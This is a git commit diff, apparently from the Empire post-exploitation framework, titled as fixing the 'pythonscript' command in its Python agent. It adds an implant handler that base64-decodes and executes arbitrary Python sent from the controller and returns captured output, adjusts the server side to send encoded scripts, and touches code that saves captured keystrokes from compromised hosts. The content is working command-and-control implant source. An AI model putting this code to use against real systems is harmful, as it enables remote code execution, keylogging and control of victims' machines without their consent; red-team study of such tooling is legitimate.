Fixed pythonscript command in python agent

Conflicts:
	lib/common/empire.py
readme-wiki
xorrior 2017-11-26 22:42:01 -05:00
parent a5b100b2d8
commit b8cda099ce
3 changed files with 46 additions and 26 deletions

View File

@ -418,6 +418,21 @@ def process_packet(packetType, data, resultID):
# TODO: implement job structure
pass
elif packetType == 121:
#base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec code_obj in globals()
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
return build_response_packet(121, result, resultID)
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)
elif packetType == 122:
#base64 decode and decompress the data
try:

View File

@ -1343,19 +1343,19 @@ class Agents:
if autorun and autorun[0] != '' and autorun[1] != '':
self.add_agent_task_db(sessionID, autorun[0], autorun[1])
if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0:
autorunCmds = ["interact %s" % sessionID]
autorunCmds.extend(self.mainMenu.autoRuns[language.lower()])
autorunCmds.extend(["lastautoruncmd"])
self.mainMenu.resourceQueue.extend(autorunCmds)
try:
#this will cause the cmdloop() to start processing the autoruns
self.mainMenu.do_agents("kickit")
except Exception as e:
if e.message == "endautorun":
pass
else:
raise e
if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0:
autorunCmds = ["interact %s" % sessionID]
autorunCmds.extend(self.mainMenu.autoRuns[language.lower()])
autorunCmds.extend(["lastautoruncmd"])
self.mainMenu.resourceQueue.extend(autorunCmds)
try:
#this will cause the cmdloop() to start processing the autoruns
self.mainMenu.do_agents("kickit")
except Exception as e:
if e.message == "endautorun":
pass
else:
raise e
return "STAGE2: %s" % (sessionID)
@ -1509,7 +1509,7 @@ class Agents:
"""
agentSessionID = sessionID
keyLogTaskID = None
keyLogTaskID = None
# see if we were passed a name instead of an ID
nameid = self.get_agent_id_db(sessionID)
@ -1603,7 +1603,7 @@ class Agents:
elif responseName == "TASK_EXIT":
# exit command response
data = "[!] Agent %s exiting" % (sessionID)
data = "[!] Agent %s exiting" % (sessionID)
# let everyone know this agent exited
dispatcher.send(data, sender='Agents')
@ -1724,20 +1724,21 @@ class Agents:
elif responseName == "TASK_CMD_JOB":
#check if this is the powershell keylogging task, if so, write output to file instead of screen
if keyLogTaskID and keyLogTaskID == taskID:
safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath)
savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID)
if not os.path.abspath(savePath).startswith(safePath):
safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath)
savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID)
if not os.path.abspath(savePath).startswith(safePath):
dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents')
return
with open(savePath,"a+") as f:
new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n")
f.write(new_results)
else:
with open(savePath,"a+") as f:
new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n")
f.write(new_results)
else:
# dynamic script output -> non-blocking
self.update_agent_results_db(sessionID, data)
# update the agent log
self.save_agent_log(sessionID, data)
# update the agent log
self.save_agent_log(sessionID, data)
# TODO: redo this regex for really large AD dumps
# so a ton of data isn't kept in memory...?
@ -1802,6 +1803,7 @@ class Agents:
self.save_agent_log(sessionID, data)
elif responseName == "TASK_SCRIPT_COMMAND":
self.update_agent_results_db(sessionID, data)
# update the agent log
self.save_agent_log(sessionID, data)

View File

@ -21,6 +21,9 @@ import hashlib
import time
import fnmatch
import shlex
import pkgutil
import importlib
import base64
# Empire imports
import helpers
@ -2589,10 +2592,10 @@ class PythonAgentMenu(SubMenu):
open_file.close()
script = script.replace('\r\n', '\n')
script = script.replace('\r', '\n')
encScript = base64.b64encode(script)
msg = "[*] Tasked agent to execute python script: "+filename
print helpers.color(msg, color="green")
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", script)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", encScript)
#update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else: